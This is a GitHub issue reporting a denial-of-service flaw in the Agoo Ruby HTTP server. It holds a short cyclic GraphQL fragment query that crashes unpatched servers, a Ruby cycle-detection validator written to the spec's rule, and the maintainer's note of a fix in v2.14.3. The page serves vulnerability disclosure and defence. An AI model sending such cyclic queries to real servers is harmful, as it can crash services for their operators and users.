ohler55 / agoo

A High Performance HTTP Server for Ruby
MIT License

Agoo Fragment Cycle Security Vulnerability #109

Closed nicholasaleks closed 2 years ago

nicholasaleks commented 2 years ago

Agoo currently does not support request validation, meaning cyclic fragment requests lead to unbounded results, causing instances of Agoo to crash.

Sample exploit script:

query test {
  __schema {
    ...A
  }
}

fragment A on __Schema {
  types {
    fields {
      name
    }
  }
  ...B
}

fragment B on __Schema {
  ...A
}

For more information see: https://github.com/nicholasaleks/graphql-threat-matrix/blob/master/implementations/agoo.md

Spec ref: https://spec.graphql.org/October2021/#sec-Fragment-spreads-must-not-form-cycles
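The spec rule linked above is straightforward to enforce before execution: build a graph of which named fragments spread which other named fragments, then look for a cycle. The Ruby below is an added example written for this page, not Agoo's validator and not code from the report; it uses a small brace-matching scan instead of a full GraphQL parser, so it assumes fragment definitions of the form `fragment Name on Type {` (no directives between the type condition and the brace) and ignores braces inside string literals. It also handles the `... on Type` inline-fragment case, which a naive spread scan would misread as a spread of a fragment named `on`. The function names (`fragment_graph`, `find_fragment_cycle`, `validate_document`) and the two sample documents are constructed here.

```ruby
# Fragment-cycle check for a GraphQL document, implementing the spec rule
# "Fragment spreads must not form cycles". Added example, not Agoo's code.
# Assumes balanced braces and definitions shaped "fragment Name on Type {".

# Constructed sample: the cyclic query from the report above.
CYCLIC_DOC = <<~GQL
  query test {
    __schema {
      ...A
    }
  }

  fragment A on __Schema {
    types {
      fields {
        name
      }
    }
    ...B
  }

  fragment B on __Schema {
    ...A
  }
GQL

# Constructed sample: same shape, but the spread chain terminates.
ACYCLIC_DOC = <<~GQL
  query test { __schema { ...A } }
  fragment A on __Schema { ...B }
  fragment B on __Schema { types { name } }
GQL

# Return the substring between the brace opened just before +start+ and its
# matching closing brace (the closing brace itself is excluded).
def balanced_body(doc, start)
  depth = 1
  i = start
  while i < doc.length && depth > 0
    case doc[i]
    when "{" then depth += 1
    when "}" then depth -= 1
    end
    i += 1
  end
  doc[start...(i - 1)]
end

# Build the spread graph: fragment name => names of fragments it spreads.
# "on" is rejected because "... on Type { }" is an inline fragment, not a
# spread, and the spec forbids "on" as a fragment name.
def fragment_graph(doc)
  graph = {}
  doc.scan(/\bfragment\s+([A-Za-z_]\w*)\s+on\s+[A-Za-z_]\w*\s*\{/) do
    name = Regexp.last_match(1)
    body = balanced_body(doc, Regexp.last_match.end(0))
    graph[name] = body.scan(/\.\.\.\s*([A-Za-z_]\w*)/).flatten.reject { |n| n == "on" }
  end
  graph
end

# Depth-first search with visiting/done states. Returns the first cycle found
# as a path such as ["A", "B", "A"], or nil when the spread graph is acyclic.
# Spreads of undefined fragments are a separate validation error and are
# simply treated as leaves here.
def find_fragment_cycle(graph)
  state = Hash.new(:unvisited)
  path = []
  visit = lambda do |name|
    state[name] = :visiting
    path.push(name)
    (graph[name] || []).each do |child|
      case state[child]
      when :visiting
        return path.drop_while { |n| n != child } + [child]
      when :unvisited
        found = visit.call(child)
        return found if found
      end
    end
    path.pop
    state[name] = :done
    nil
  end
  graph.each_key do |name|
    next unless state[name] == :unvisited
    cycle = visit.call(name)
    return cycle if cycle
  end
  nil
end

# Reject a document before it reaches the executor; returns an error string
# describing the cycle, or nil when the document passes this check.
def validate_document(doc)
  cycle = find_fragment_cycle(fragment_graph(doc))
  cycle ? "fragment cycle: #{cycle.join(' -> ')}" : nil
end

if __FILE__ == $PROGRAM_NAME
  puts validate_document(CYCLIC_DOC)
  p validate_document(ACYCLIC_DOC)
end
```

Run as a script it reports `fragment cycle: A -> B -> A` for the report's query and `nil` for the terminating variant. A server would run this (together with the rest of the spec's validation rules) on every incoming document and return a validation error instead of expanding the fragments, which is what removes the unbounded expansion.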

ohler55 commented 2 years ago

Fixed in v2.14.3.

ohler55 commented 2 years ago

It would have been nice to give me more than a day to fix the issue before submitting to the NVD. Just saying...